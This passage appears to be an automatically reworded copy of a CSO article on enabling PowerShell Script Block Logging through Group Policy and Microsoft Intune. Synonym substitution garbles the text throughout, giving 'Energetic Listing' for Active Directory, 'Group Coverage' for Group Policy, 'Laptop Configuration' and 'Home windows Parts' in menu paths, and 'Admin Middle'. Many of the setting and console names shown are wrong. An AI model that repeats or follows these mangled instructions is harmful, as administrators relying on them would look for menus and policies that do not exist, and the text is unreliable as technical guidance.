Group coverage
In case you use conventional Energetic Listing instruments, use group coverage to allow PowerShell logging. Open the Group Coverage Administration Console. Create a brand new Group Coverage Object (GPO) or edit an present one. Navigate to Laptop Configuration > Administrative Templates > Home windows Parts > Home windows PowerShell. Find the setting “Activate PowerShell Script Block Logging” and set it to Enabled.
Susan Bradley / CSO
This logging means that you can seize the content material of all executed scripts, together with instructions and features.
Intune
Equally in Intune carry out the next steps: Go to Microsoft Intune Admin Middle and discover units. Click on on Home windows units and Configuration. Click on Create, choose New Coverage. Choose Home windows 10 and later, choose Settings Catalog underneath profile sort, and click on Create. Enter PowerShell Configuration as title, enter a Description if wanted, and click on Subsequent. Click on Add settings, enter PowerShell within the Seek for a setting bar, and click on Search. Choose Administrative TemplatesWindows ComponentsWindows PowerShell, and click on Choose all these settings, or undergo every one and choose these you wish to monitor.
